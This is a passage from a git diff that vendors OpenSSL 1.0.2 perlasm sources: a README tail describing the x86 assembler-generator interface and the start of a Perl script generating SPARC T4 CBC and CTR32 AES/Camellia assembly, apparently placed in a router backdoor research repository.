+&asm_init($ARGV[0],$0);
+
+The first argument is the 'type'.  Currently
+'cpp', 'sol', 'a.out', 'elf' or 'win32'.
+Argument 2 is the file name.
+
+The reciprocal function is
+&asm_finish() which should be called at the end.
+
+There are 2 main 'packages'. x86ms.pl, which is the microsoft assembler,
+and x86unix.pl which is the unix (gas) version.
+
+Functions of interest are:
+&external_label("des_SPtrans");	declare and external variable
+&LB(reg);			Low byte for a register
+&HB(reg);			High byte for a register
+&BP(off,base,index,scale)	Byte pointer addressing
+&DWP(off,base,index,scale)	Word pointer addressing
+&stack_push(num)		Basically a 'sub esp, num*4' with extra
+&stack_pop(num)			inverse of stack_push
+&function_begin(name,extra)	Start a function with pushing of
+				edi, esi, ebx and ebp.  extra is extra win32
+				external info that may be required.
+&function_begin_B(name,extra)	Same as norma function_begin but no pushing.
+&function_end(name)		Call at end of function.
+&function_end_A(name)		Standard pop and ret, for use inside functions
+&function_end_B(name)		Call at end but with poping or 'ret'.
+&swtmp(num)			Address on stack temp word.
+&wparam(num)			Parameter number num, that was push
+				in C convention.  This all works over pushes
+				and pops.
+&comment("hello there")		Put in a comment.
+&label("loop")			Refer to a label, normally a jmp target.
+&set_label("loop")		Set a label at this point.
+&data_word(word)		Put in a word of data.
+
+So how does this all hold together?  Given
+
+int calc(int len, int *data)
+	{
+	int i,j=0;
+
+	for (i=0; i<len; i++)
+		{
+		j+=other(data[i]);
+		}
+	}
+
+So a very simple version of this function could be coded as
+
+	push(@INC,"perlasm","../../perlasm");
+	require "x86asm.pl";
+	
+	&asm_init($ARGV[0],"cacl.pl");
+
+	&external_label("other");
+
+	$tmp1=	"eax";
+	$j=	"edi";
+	$data=	"esi";
+	$i=	"ebp";
+
+	&comment("a simple function");
+	&function_begin("calc");
+	&mov(	$data,		&wparam(1)); # data
+	&xor(	$j,		$j);
+	&xor(	$i,		$i);
+
+	&set_label("loop");
+	&cmp(	$i,		&wparam(0));
+	&jge(	&label("end"));
+
+	&mov(	$tmp1,		&DWP(0,$data,$i,4));
+	&push(	$tmp1);
+	&call(	"other");
+	&add(	$j,		"eax");
+	&pop(	$tmp1);
+	&inc(	$i);
+	&jmp(	&label("loop"));
+
+	&set_label("end");
+	&mov(	"eax",		$j);
+
+	&function_end("calc");
+
+	&asm_finish();
+
+The above example is very very unoptimised but gives an idea of how
+things work.
+
+There is also a cbc mode function generator in cbc.pl
+
+&cbc(	$name,
+	$encrypt_function_name,
+	$decrypt_function_name,
+	$true_if_byte_swap_needed,
+	$parameter_number_for_iv,
+	$parameter_number_for_encrypt_flag,
+	$first_parameter_to_pass,
+	$second_parameter_to_pass,
+	$third_parameter_to_pass);
+
+So for example, given
+void BF_encrypt(BF_LONG *data,BF_KEY *key);
+void BF_decrypt(BF_LONG *data,BF_KEY *key);
+void BF_cbc_encrypt(unsigned char *in, unsigned char *out, long length,
+        BF_KEY *ks, unsigned char *iv, int enc);
+
+&cbc("BF_cbc_encrypt","BF_encrypt","BF_encrypt",1,4,5,3,-1,-1);
+
+&cbc("des_ncbc_encrypt","des_encrypt","des_encrypt",0,4,5,3,5,-1);
+&cbc("des_ede3_cbc_encrypt","des_encrypt3","des_decrypt3",0,6,7,3,4,5);
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/sparcv9_modes.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/sparcv9_modes.pl
new file mode 100644
index 0000000..dc55b34
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/sparcv9_modes.pl
@@ -0,0 +1,1686 @@
+#!/usr/bin/env perl
+
+# Specific modes implementations for SPARC Architecture 2011. There
+# is T4 dependency though, an ASI value that is not specified in the
+# Architecture Manual. But as SPARC universe is rather monocultural,
+# we imply that processor capable of executing crypto instructions
+# can handle the ASI in question as well. This means that we ought to
+# keep eyes open when new processors emerge...
+#
+# As for above mentioned ASI. It's so called "block initializing
+# store" which cancels "read" in "read-update-write" on cache lines.
+# This is "cooperative" optimization, as it reduces overall pressure
+# on memory interface. Benefits can't be observed/quantified with
+# usual benchmarks, on the contrary you can notice that single-thread
+# performance for parallelizable modes is ~1.5% worse for largest
+# block sizes [though few percent better for not so long ones]. All
+# this based on suggestions from David Miller.
+
+sub asm_init {		# to be called with @ARGV as argument
+    for (@_)		{ $::abibits=64 if (/\-m64/ || /\-xarch\=v9/); }
+    if ($::abibits==64)	{ $::bias=2047; $::frame=192; $::size_t_cc="%xcc"; }
+    else		{ $::bias=0;    $::frame=112; $::size_t_cc="%icc"; }
+}
+
+# unified interface
+my ($inp,$out,$len,$key,$ivec)=map("%i$_",(0..5));
+# local variables
+my ($ileft,$iright,$ooff,$omask,$ivoff,$blk_init)=map("%l$_",(0..7));
+
+sub alg_cbc_encrypt_implement {
+my ($alg,$bits) = @_;
+
+$::code.=<<___;
+.globl	${alg}${bits}_t4_cbc_encrypt
+.align	32
+${alg}${bits}_t4_cbc_encrypt:
+	save		%sp, -$::frame, %sp
+	cmp		$len, 0
+	be,pn		$::size_t_cc, .L${bits}_cbc_enc_abort
+	sub		$inp, $out, $blk_init	! $inp!=$out
+___
+$::code.=<<___ if (!$::evp);
+	andcc		$ivec, 7, $ivoff
+	alignaddr	$ivec, %g0, $ivec
+
+	ldd		[$ivec + 0], %f0	! load ivec
+	bz,pt		%icc, 1f
+	ldd		[$ivec + 8], %f2
+	ldd		[$ivec + 16], %f4
+	faligndata	%f0, %f2, %f0
+	faligndata	%f2, %f4, %f2
+1:
+___
+$::code.=<<___ if ($::evp);
+	ld		[$ivec + 0], %f0
+	ld		[$ivec + 4], %f1
+	ld		[$ivec + 8], %f2
+	ld		[$ivec + 12], %f3
+___
+$::code.=<<___;
+	prefetch	[$inp], 20
+	prefetch	[$inp + 63], 20
+	call		_${alg}${bits}_load_enckey
+	and		$inp, 7, $ileft
+	andn		$inp, 7, $inp
+	sll		$ileft, 3, $ileft
+	mov		64, $iright
+	mov		0xff, $omask
+	sub		$iright, $ileft, $iright
+	and		$out, 7, $ooff
+	cmp		$len, 127
+	movrnz		$ooff, 0, $blk_init		! if (	$out&7 ||
+	movleu		$::size_t_cc, 0, $blk_init	!	$len<128 ||
+	brnz,pn		$blk_init, .L${bits}cbc_enc_blk	!	$inp==$out)
+	srl		$omask, $ooff, $omask
+
+	alignaddrl	$out, %g0, $out
+	srlx		$len, 4, $len
+	prefetch	[$out], 22
+
+.L${bits}_cbc_enc_loop:
+	ldx		[$inp + 0], %o0
+	brz,pt		$ileft, 4f
+	ldx		[$inp + 8], %o1
+
+	ldx		[$inp + 16], %o2
+	sllx		%o0, $ileft, %o0
+	srlx		%o1, $iright, %g1
+	sllx		%o1, $ileft, %o1
+	or		%g1, %o0, %o0
+	srlx		%o2, $iright, %o2
+	or		%o2, %o1, %o1
+4:
+	xor		%g4, %o0, %o0		! ^= rk[0]
+	xor		%g5, %o1, %o1
+	movxtod		%o0, %f12
+	movxtod		%o1, %f14
+
+	fxor		%f12, %f0, %f0		! ^= ivec
+	fxor		%f14, %f2, %f2
+	prefetch	[$out + 63], 22
+	prefetch	[$inp + 16+63], 20
+	call		_${alg}${bits}_encrypt_1x
+	add		$inp, 16, $inp
+
+	brnz,pn		$ooff, 2f
+	sub		$len, 1, $len
+		
+	std		%f0, [$out + 0]
+	std		%f2, [$out + 8]
+	brnz,pt		$len, .L${bits}_cbc_enc_loop
+	add		$out, 16, $out
+___
+$::code.=<<___ if ($::evp);
+	st		%f0, [$ivec + 0]
+	st		%f1, [$ivec + 4]
+	st		%f2, [$ivec + 8]
+	st		%f3, [$ivec + 12]
+___
+$::code.=<<___ if (!$::evp);
+	brnz,pn		$ivoff, 3f
+	nop
+
+	std		%f0, [$ivec + 0]	! write out ivec
+	std		%f2, [$ivec + 8]
+___
+$::code.=<<___;
+.L${bits}_cbc_enc_abort:
+	ret
+	restore
+
+.align	16
+2:	ldxa		[$inp]0x82, %o0		! avoid read-after-write hazard
+						! and ~3x deterioration
+						! in inp==out case
+	faligndata	%f0, %f0, %f4		! handle unaligned output
+	faligndata	%f0, %f2, %f6
+	faligndata	%f2, %f2, %f8
+
+	stda		%f4, [$out + $omask]0xc0	! partial store
+	std		%f6, [$out + 8]
+	add		$out, 16, $out
+	orn		%g0, $omask, $omask
+	stda		%f8, [$out + $omask]0xc0	! partial store
+
+	brnz,pt		$len, .L${bits}_cbc_enc_loop+4
+	orn		%g0, $omask, $omask
+___
+$::code.=<<___ if ($::evp);
+	st		%f0, [$ivec + 0]
+	st		%f1, [$ivec + 4]
+	st		%f2, [$ivec + 8]
+	st		%f3, [$ivec + 12]
+___
+$::code.=<<___ if (!$::evp);
+	brnz,pn		$ivoff, 3f
+	nop
+
+	std		%f0, [$ivec + 0]	! write out ivec
+	std		%f2, [$ivec + 8]
+	ret
+	restore
+
+.align	16
+3:	alignaddrl	$ivec, $ivoff, %g0	! handle unaligned ivec
+	mov		0xff, $omask
+	srl		$omask, $ivoff, $omask
+	faligndata	%f0, %f0, %f4
+	faligndata	%f0, %f2, %f6
+	faligndata	%f2, %f2, %f8
+	stda		%f4, [$ivec + $omask]0xc0
+	std		%f6, [$ivec + 8]
+	add		$ivec, 16, $ivec
+	orn		%g0, $omask, $omask
+	stda		%f8, [$ivec + $omask]0xc0
+___
+$::code.=<<___;
+	ret
+	restore
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+.align	32
+.L${bits}cbc_enc_blk:
+	add	$out, $len, $blk_init
+	and	$blk_init, 63, $blk_init	! tail
+	sub	$len, $blk_init, $len
+	add	$blk_init, 15, $blk_init	! round up to 16n
+	srlx	$len, 4, $len
+	srl	$blk_init, 4, $blk_init
+
+.L${bits}_cbc_enc_blk_loop:
+	ldx		[$inp + 0], %o0
+	brz,pt		$ileft, 5f
+	ldx		[$inp + 8], %o1
+
+	ldx		[$inp + 16], %o2
+	sllx		%o0, $ileft, %o0
+	srlx		%o1, $iright, %g1
+	sllx		%o1, $ileft, %o1
+	or		%g1, %o0, %o0
+	srlx		%o2, $iright, %o2
+	or		%o2, %o1, %o1
+5:
+	xor		%g4, %o0, %o0		! ^= rk[0]
+	xor		%g5, %o1, %o1
+	movxtod		%o0, %f12
+	movxtod		%o1, %f14
+
+	fxor		%f12, %f0, %f0		! ^= ivec
+	fxor		%f14, %f2, %f2
+	prefetch	[$inp + 16+63], 20
+	call		_${alg}${bits}_encrypt_1x
+	add		$inp, 16, $inp
+	sub		$len, 1, $len
+		
+	stda		%f0, [$out]0xe2		! ASI_BLK_INIT, T4-specific
+	add		$out, 8, $out
+	stda		%f2, [$out]0xe2		! ASI_BLK_INIT, T4-specific
+	brnz,pt		$len, .L${bits}_cbc_enc_blk_loop
+	add		$out, 8, $out
+
+	membar		#StoreLoad|#StoreStore
+	brnz,pt		$blk_init, .L${bits}_cbc_enc_loop
+	mov		$blk_init, $len
+___
+$::code.=<<___ if ($::evp);
+	st		%f0, [$ivec + 0]
+	st		%f1, [$ivec + 4]
+	st		%f2, [$ivec + 8]
+	st		%f3, [$ivec + 12]
+___
+$::code.=<<___ if (!$::evp);
+	brnz,pn		$ivoff, 3b
+	nop
+
+	std		%f0, [$ivec + 0]	! write out ivec
+	std		%f2, [$ivec + 8]
+___
+$::code.=<<___;
+	ret
+	restore
+.type	${alg}${bits}_t4_cbc_encrypt,#function
+.size	${alg}${bits}_t4_cbc_encrypt,.-${alg}${bits}_t4_cbc_encrypt
+___
+}
+
+sub alg_cbc_decrypt_implement {
+my ($alg,$bits) = @_;
+
+$::code.=<<___;
+.globl	${alg}${bits}_t4_cbc_decrypt
+.align	32
+${alg}${bits}_t4_cbc_decrypt:
+	save		%sp, -$::frame, %sp
+	cmp		$len, 0
+	be,pn		$::size_t_cc, .L${bits}_cbc_dec_abort
+	sub		$inp, $out, $blk_init	! $inp!=$out
+___
+$::code.=<<___ if (!$::evp);
+	andcc		$ivec, 7, $ivoff
+	alignaddr	$ivec, %g0, $ivec
+
+	ldd		[$ivec + 0], %f12	! load ivec
+	bz,pt		%icc, 1f
+	ldd		[$ivec + 8], %f14
+	ldd		[$ivec + 16], %f0
+	faligndata	%f12, %f14, %f12
+	faligndata	%f14, %f0, %f14
+1:
+___
+$::code.=<<___ if ($::evp);
+	ld		[$ivec + 0], %f12	! load ivec
+	ld		[$ivec + 4], %f13
+	ld		[$ivec + 8], %f14
+	ld		[$ivec + 12], %f15
+___
+$::code.=<<___;
+	prefetch	[$inp], 20
+	prefetch	[$inp + 63], 20
+	call		_${alg}${bits}_load_deckey
+	and		$inp, 7, $ileft
+	andn		$inp, 7, $inp
+	sll		$ileft, 3, $ileft
+	mov		64, $iright
+	mov		0xff, $omask
+	sub		$iright, $ileft, $iright
+	and		$out, 7, $ooff
+	cmp		$len, 255
+	movrnz		$ooff, 0, $blk_init		! if (	$out&7 ||
+	movleu		$::size_t_cc, 0, $blk_init	!	$len<256 ||
+	brnz,pn		$blk_init, .L${bits}cbc_dec_blk	!	$inp==$out)
+	srl		$omask, $ooff, $omask
+
+	andcc		$len, 16, %g0		! is number of blocks even?
+	srlx		$len, 4, $len
+	alignaddrl	$out, %g0, $out
+	bz		%icc, .L${bits}_cbc_dec_loop2x
+	prefetch	[$out], 22
+.L${bits}_cbc_dec_loop:
+	ldx		[$inp + 0], %o0
+	brz,pt		$ileft, 4f
+	ldx		[$inp + 8], %o1
+
+	ldx		[$inp + 16], %o2
+	sllx		%o0, $ileft, %o0
+	srlx		%o1, $iright, %g1
+	sllx		%o1, $ileft, %o1
+	or		%g1, %o0, %o0
+	srlx		%o2, $iright, %o2
+	or		%o2, %o1, %o1
+4:
+	xor		%g4, %o0, %o2		! ^= rk[0]
+	xor		%g5, %o1, %o3
+	movxtod		%o2, %f0
+	movxtod		%o3, %f2
+
+	prefetch	[$out + 63], 22
+	prefetch	[$inp + 16+63], 20
+	call		_${alg}${bits}_decrypt_1x
+	add		$inp, 16, $inp
+
+	fxor		%f12, %f0, %f0		! ^= ivec
+	fxor		%f14, %f2, %f2
+	movxtod		%o0, %f12
+	movxtod		%o1, %f14
+
+	brnz,pn		$ooff, 2f
+	sub		$len, 1, $len
+		
+	std		%f0, [$out + 0]
+	std		%f2, [$out + 8]
+	brnz,pt		$len, .L${bits}_cbc_dec_loop2x
+	add		$out, 16, $out
+___
+$::code.=<<___ if ($::evp);
+	st		%f12, [$ivec + 0]
+	st		%f13, [$ivec + 4]
+	st		%f14, [$ivec + 8]
+	st		%f15, [$ivec + 12]
+___
+$::code.=<<___ if (!$::evp);
+	brnz,pn		$ivoff, .L${bits}_cbc_dec_unaligned_ivec
+	nop
+
+	std		%f12, [$ivec + 0]	! write out ivec
+	std		%f14, [$ivec + 8]
+___
+$::code.=<<___;
+.L${bits}_cbc_dec_abort:
+	ret
+	restore
+
+.align	16
+2:	ldxa		[$inp]0x82, %o0		! avoid read-after-write hazard
+						! and ~3x deterioration
+						! in inp==out case
+	faligndata	%f0, %f0, %f4		! handle unaligned output
+	faligndata	%f0, %f2, %f6
+	faligndata	%f2, %f2, %f8
+
+	stda		%f4, [$out + $omask]0xc0	! partial store
+	std		%f6, [$out + 8]
+	add		$out, 16, $out
+	orn		%g0, $omask, $omask
+	stda		%f8, [$out + $omask]0xc0	! partial store
+
+	brnz,pt		$len, .L${bits}_cbc_dec_loop2x+4
+	orn		%g0, $omask, $omask
+___
+$::code.=<<___ if ($::evp);
+	st		%f12, [$ivec + 0]
+	st		%f13, [$ivec + 4]
+	st		%f14, [$ivec + 8]
+	st		%f15, [$ivec + 12]
+___
+$::code.=<<___ if (!$::evp);
+	brnz,pn		$ivoff, .L${bits}_cbc_dec_unaligned_ivec
+	nop
+
+	std		%f12, [$ivec + 0]	! write out ivec
+	std		%f14, [$ivec + 8]
+___
+$::code.=<<___;
+	ret
+	restore
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+.align	32
+.L${bits}_cbc_dec_loop2x:
+	ldx		[$inp + 0], %o0
+	ldx		[$inp + 8], %o1
+	ldx		[$inp + 16], %o2
+	brz,pt		$ileft, 4f
+	ldx		[$inp + 24], %o3
+
+	ldx		[$inp + 32], %o4
+	sllx		%o0, $ileft, %o0
+	srlx		%o1, $iright, %g1
+	or		%g1, %o0, %o0
+	sllx		%o1, $ileft, %o1
+	srlx		%o2, $iright, %g1
+	or		%g1, %o1, %o1
+	sllx		%o2, $ileft, %o2
+	srlx		%o3, $iright, %g1
+	or		%g1, %o2, %o2
+	sllx		%o3, $ileft, %o3
+	srlx		%o4, $iright, %o4
+	or		%o4, %o3, %o3
+4:
+	xor		%g4, %o0, %o4		! ^= rk[0]
+	xor		%g5, %o1, %o5
+	movxtod		%o4, %f0
+	movxtod		%o5, %f2
+	xor		%g4, %o2, %o4
+	xor		%g5, %o3, %o5
+	movxtod		%o4, %f4
+	movxtod		%o5, %f6
+
+	prefetch	[$out + 63], 22
+	prefetch	[$inp + 32+63], 20
+	call		_${alg}${bits}_decrypt_2x
+	add		$inp, 32, $inp
+
+	movxtod		%o0, %f8
+	movxtod		%o1, %f10
+	fxor		%f12, %f0, %f0		! ^= ivec
+	fxor		%f14, %f2, %f2
+	movxtod		%o2, %f12
+	movxtod		%o3, %f14
+	fxor		%f8, %f4, %f4
+	fxor		%f10, %f6, %f6
+
+	brnz,pn		$ooff, 2f
+	sub		$len, 2, $len
+		
+	std		%f0, [$out + 0]
+	std		%f2, [$out + 8]
+	std		%f4, [$out + 16]
+	std		%f6, [$out + 24]
+	brnz,pt		$len, .L${bits}_cbc_dec_loop2x
+	add		$out, 32, $out
+___
+$::code.=<<___ if ($::evp);
+	st		%f12, [$ivec + 0]
+	st		%f13, [$ivec + 4]
+	st		%f14, [$ivec + 8]
+	st		%f15, [$ivec + 12]
+___
+$::code.=<<___ if (!$::evp);
+	brnz,pn		$ivoff, .L${bits}_cbc_dec_unaligned_ivec
+	nop
+
+	std		%f12, [$ivec + 0]	! write out ivec
+	std		%f14, [$ivec + 8]
+___
+$::code.=<<___;
+	ret
+	restore
+
+.align	16
+2:	ldxa		[$inp]0x82, %o0		! avoid read-after-write hazard
+						! and ~3x deterioration
+						! in inp==out case
+	faligndata	%f0, %f0, %f8		! handle unaligned output
+	faligndata	%f0, %f2, %f0
+	faligndata	%f2, %f4, %f2
+	faligndata	%f4, %f6, %f4
+	faligndata	%f6, %f6, %f6
+	stda		%f8, [$out + $omask]0xc0	! partial store
+	std		%f0, [$out + 8]
+	std		%f2, [$out + 16]
+	std		%f4, [$out + 24]
+	add		$out, 32, $out
+	orn		%g0, $omask, $omask
+	stda		%f6, [$out + $omask]0xc0	! partial store
+
+	brnz,pt		$len, .L${bits}_cbc_dec_loop2x+4
+	orn		%g0, $omask, $omask
+___
+$::code.=<<___ if ($::evp);
+	st		%f12, [$ivec + 0]
+	st		%f13, [$ivec + 4]
+	st		%f14, [$ivec + 8]
+	st		%f15, [$ivec + 12]
+___
+$::code.=<<___ if (!$::evp);
+	brnz,pn		$ivoff, .L${bits}_cbc_dec_unaligned_ivec
+	nop
+
+	std		%f12, [$ivec + 0]	! write out ivec
+	std		%f14, [$ivec + 8]
+	ret
+	restore
+
+.align	16
+.L${bits}_cbc_dec_unaligned_ivec:
+	alignaddrl	$ivec, $ivoff, %g0	! handle unaligned ivec
+	mov		0xff, $omask
+	srl		$omask, $ivoff, $omask
+	faligndata	%f12, %f12, %f0
+	faligndata	%f12, %f14, %f2
+	faligndata	%f14, %f14, %f4
+	stda		%f0, [$ivec + $omask]0xc0
+	std		%f2, [$ivec + 8]
+	add		$ivec, 16, $ivec
+	orn		%g0, $omask, $omask
+	stda		%f4, [$ivec + $omask]0xc0
+___
+$::code.=<<___;
+	ret
+	restore
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+.align	32
+.L${bits}cbc_dec_blk:
+	add	$out, $len, $blk_init
+	and	$blk_init, 63, $blk_init	! tail
+	sub	$len, $blk_init, $len
+	add	$blk_init, 15, $blk_init	! round up to 16n
+	srlx	$len, 4, $len
+	srl	$blk_init, 4, $blk_init
+	sub	$len, 1, $len
+	add	$blk_init, 1, $blk_init
+
+.L${bits}_cbc_dec_blk_loop2x:
+	ldx		[$inp + 0], %o0
+	ldx		[$inp + 8], %o1
+	ldx		[$inp + 16], %o2
+	brz,pt		$ileft, 5f
+	ldx		[$inp + 24], %o3
+
+	ldx		[$inp + 32], %o4
+	sllx		%o0, $ileft, %o0
+	srlx		%o1, $iright, %g1
+	or		%g1, %o0, %o0
+	sllx		%o1, $ileft, %o1
+	srlx		%o2, $iright, %g1
+	or		%g1, %o1, %o1
+	sllx		%o2, $ileft, %o2
+	srlx		%o3, $iright, %g1
+	or		%g1, %o2, %o2
+	sllx		%o3, $ileft, %o3
+	srlx		%o4, $iright, %o4
+	or		%o4, %o3, %o3
+5:
+	xor		%g4, %o0, %o4		! ^= rk[0]
+	xor		%g5, %o1, %o5
+	movxtod		%o4, %f0
+	movxtod		%o5, %f2
+	xor		%g4, %o2, %o4
+	xor		%g5, %o3, %o5
+	movxtod		%o4, %f4
+	movxtod		%o5, %f6
+
+	prefetch	[$inp + 32+63], 20
+	call		_${alg}${bits}_decrypt_2x
+	add		$inp, 32, $inp
+	subcc		$len, 2, $len
+
+	movxtod		%o0, %f8
+	movxtod		%o1, %f10
+	fxor		%f12, %f0, %f0		! ^= ivec
+	fxor		%f14, %f2, %f2
+	movxtod		%o2, %f12
+	movxtod		%o3, %f14
+	fxor		%f8, %f4, %f4
+	fxor		%f10, %f6, %f6
+
+	stda		%f0, [$out]0xe2		! ASI_BLK_INIT, T4-specific
+	add		$out, 8, $out
+	stda		%f2, [$out]0xe2		! ASI_BLK_INIT, T4-specific
+	add		$out, 8, $out
+	stda		%f4, [$out]0xe2		! ASI_BLK_INIT, T4-specific
+	add		$out, 8, $out
+	stda		%f6, [$out]0xe2		! ASI_BLK_INIT, T4-specific
+	bgu,pt		$::size_t_cc, .L${bits}_cbc_dec_blk_loop2x
+	add		$out, 8, $out
+
+	add		$blk_init, $len, $len
+	andcc		$len, 1, %g0		! is number of blocks even?
+	membar		#StoreLoad|#StoreStore
+	bnz,pt		%icc, .L${bits}_cbc_dec_loop
+	srl		$len, 0, $len
+	brnz,pn		$len, .L${bits}_cbc_dec_loop2x
+	nop
+___
+$::code.=<<___ if ($::evp);
+	st		%f12, [$ivec + 0]	! write out ivec
+	st		%f13, [$ivec + 4]
+	st		%f14, [$ivec + 8]
+	st		%f15, [$ivec + 12]
+___
+$::code.=<<___ if (!$::evp);
+	brnz,pn		$ivoff, 3b
+	nop
+
+	std		%f12, [$ivec + 0]	! write out ivec
+	std		%f14, [$ivec + 8]
+___
+$::code.=<<___;
+	ret
+	restore
+.type	${alg}${bits}_t4_cbc_decrypt,#function
+.size	${alg}${bits}_t4_cbc_decrypt,.-${alg}${bits}_t4_cbc_decrypt
+___
+}
+
+sub alg_ctr32_implement {
+my ($alg,$bits) = @_;
+
+$::code.=<<___;
+.globl	${alg}${bits}_t4_ctr32_encrypt
+.align	32
+${alg}${bits}_t4_ctr32_encrypt:
+	save		%sp, -$::frame, %sp
+
+	prefetch	[$inp], 20
+	prefetch	[$inp + 63], 20
+	call		_${alg}${bits}_load_enckey
+	sllx		$len, 4, $len
+
+	ld		[$ivec + 0], %l4	! counter
+	ld		[$ivec + 4], %l5
+	ld		[$ivec + 8], %l6
+	ld		[$ivec + 12], %l7
+
+	sllx		%l4, 32, %o5
+	or		%l5, %o5, %o5
+	sllx		%l6, 32, %g1
+	xor		%o5, %g4, %g4		! ^= rk[0]
+	xor		%g1, %g5, %g5
+	movxtod		%g4, %f14		! most significant 64 bits
+
+	sub		$inp, $out, $blk_init	! $inp!=$out
+	and		$inp, 7, $ileft
+	andn		$inp, 7, $inp
+	sll		$ileft, 3, $ileft
+	mov		64, $iright
+	mov		0xff, $omask
+	sub		$iright, $ileft, $iright
+	and		$out, 7, $ooff
+	cmp		$len, 255
+	movrnz		$ooff, 0, $blk_init		! if (	$out&7 ||
+	movleu		$::size_t_cc, 0, $blk_init	!	$len<256 ||
+	brnz,pn		$blk_init, .L${bits}_ctr32_blk	!	$inp==$out)
+	srl		$omask, $ooff, $omask
+
+	andcc		$len, 16, %g0		! is number of blocks even?
+	alignaddrl	$out, %g0, $out
+	bz		%icc, .L${bits}_ctr32_loop2x
+	srlx		$len, 4, $len
+.L${bits}_ctr32_loop:
+	ldx		[$inp + 0], %o0
+	brz,pt		$ileft, 4f
+	ldx		[$inp + 8], %o1
+
+	ldx		[$inp + 16], %o2
+	sllx		%o0, $ileft, %o0
+	srlx		%o1, $iright, %g1
+	sllx		%o1, $ileft, %o1
+	or		%g1, %o0, %o0
+	srlx		%o2, $iright, %o2
+	or		%o2, %o1, %o1
+4:
+	xor		%g5, %l7, %g1		! ^= rk[0]
+	add		%l7, 1, %l7
+	movxtod		%g1, %f2
+	srl		%l7, 0, %l7		! clruw
+	prefetch	[$out + 63], 22
+	prefetch	[$inp + 16+63], 20
+___
+$::code.=<<___ if ($alg eq "aes");
+	aes_eround01	%f16, %f14, %f2, %f4
+	aes_eround23	%f18, %f14, %f2, %f2
+___
+$::code.=<<___ if ($alg eq "cmll");
+	camellia_f	%f16, %f2, %f14, %f2
+	camellia_f	%f18, %f14, %f2, %f0
+___
+$::code.=<<___;
+	call		_${alg}${bits}_encrypt_1x+8
+	add		$inp, 16, $inp
+
+	movxtod		%o0, %f10
+	movxtod		%o1, %f12
+	fxor		%f10, %f0, %f0		! ^= inp
+	fxor		%f12, %f2, %f2
+
+	brnz,pn		$ooff, 2f
+	sub		$len, 1, $len
+		
+	std		%f0, [$out + 0]
+	std		%f2, [$out + 8]
+	brnz,pt		$len, .L${bits}_ctr32_loop2x
+	add		$out, 16, $out
+
+	ret
+	restore
+
+.align	16
+2:	ldxa		[$inp]0x82, %o0		! avoid read-after-write hazard
+						! and ~3x deterioration
+						! in inp==out case
+	faligndata	%f0, %f0, %f4		! handle unaligned output
+	faligndata	%f0, %f2, %f6
+	faligndata	%f2, %f2, %f8
+	stda		%f4, [$out + $omask]0xc0	! partial store
+	std		%f6, [$out + 8]
+	add		$out, 16, $out
+	orn		%g0, $omask, $omask
+	stda		%f8, [$out + $omask]0xc0	! partial store
+
+	brnz,pt		$len, .L${bits}_ctr32_loop2x+4
+	orn		%g0, $omask, $omask
+
+	ret
+	restore
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+.align	32
+.L${bits}_ctr32_loop2x:
+	ldx		[$inp + 0], %o0
+	ldx		[$inp + 8], %o1
+	ldx		[$inp + 16], %o2
+	brz,pt		$ileft, 4f
+	ldx		[$inp + 24], %o3
+
+	ldx		[$inp + 32], %o4
+	sllx		%o0, $ileft, %o0
+	srlx		%o1, $iright, %g1
+	or		%g1, %o0, %o0
+	sllx		%o1, $ileft, %o1
+	srlx		%o2, $iright, %g1
+	or		%g1, %o1, %o1
+	sllx		%o2, $ileft, %o2
+	srlx		%o3, $iright, %g1
+	or		%g1, %o2, %o2
+	sllx		%o3, $ileft, %o3
+	srlx		%o4, $iright, %o4
+	or		%o4, %o3, %o3
+4:
+	xor		%g5, %l7, %g1		! ^= rk[0]
+	add		%l7, 1, %l7
+	movxtod		%g1, %f2
+	srl		%l7, 0, %l7		! clruw
+	xor		%g5, %l7, %g1
+	add		%l7, 1, %l7
+	movxtod		%g1, %f6
+	srl		%l7, 0, %l7		! clruw
+	prefetch	[$out + 63], 22
+	prefetch	[$inp + 32+63], 20
+___
+$::code.=<<___ if ($alg eq "aes");
+	aes_eround01	%f16, %f14, %f2, %f8
+	aes_eround23	%f18, %f14, %f2, %f2
+	aes_eround01	%f16, %f14, %f6, %f10
+	aes_eround23	%f18, %f14, %f6, %f6
+___
+$::code.=<<___ if ($alg eq "cmll");
+	camellia_f	%f16, %f2, %f14, %f2
+	camellia_f	%f16, %f6, %f14, %f6
+	camellia_f	%f18, %f14, %f2, %f0
+	camellia_f	%f18, %f14, %f6, %f4
+___
+$::code.=<<___;
+	call		_${alg}${bits}_encrypt_2x+16
+	add		$inp, 32, $inp
+
+	movxtod		%o0, %f8
+	movxtod		%o1, %f10
+	movxtod		%o2, %f12
+	fxor		%f8, %f0, %f0		! ^= inp
+	movxtod		%o3, %f8
+	fxor		%f10, %f2, %f2
+	fxor		%f12, %f4, %f4
+	fxor		%f8, %f6, %f6
+
+	brnz,pn		$ooff, 2f
+	sub		$len, 2, $len
+		
+	std		%f0, [$out + 0]
+	std		%f2, [$out + 8]
+	std		%f4, [$out + 16]
+	std		%f6, [$out + 24]
+	brnz,pt		$len, .L${bits}_ctr32_loop2x
+	add		$out, 32, $out
+
+	ret
+	restore
+
+.align	16
+2:	ldxa		[$inp]0x82, %o0		! avoid read-after-write hazard
+						! and ~3x deterioration
+						! in inp==out case
+	faligndata	%f0, %f0, %f8		! handle unaligned output
+	faligndata	%f0, %f2, %f0
+	faligndata	%f2, %f4, %f2
+	faligndata	%f4, %f6, %f4
+	faligndata	%f6, %f6, %f6
+
+	stda		%f8, [$out + $omask]0xc0	! partial store
+	std		%f0, [$out + 8]
+	std		%f2, [$out + 16]
+	std		%f4, [$out + 24]
+	add		$out, 32, $out
+	orn		%g0, $omask, $omask
+	stda		%f6, [$out + $omask]0xc0	! partial store
+
+	brnz,pt		$len, .L${bits}_ctr32_loop2x+4
+	orn		%g0, $omask, $omask
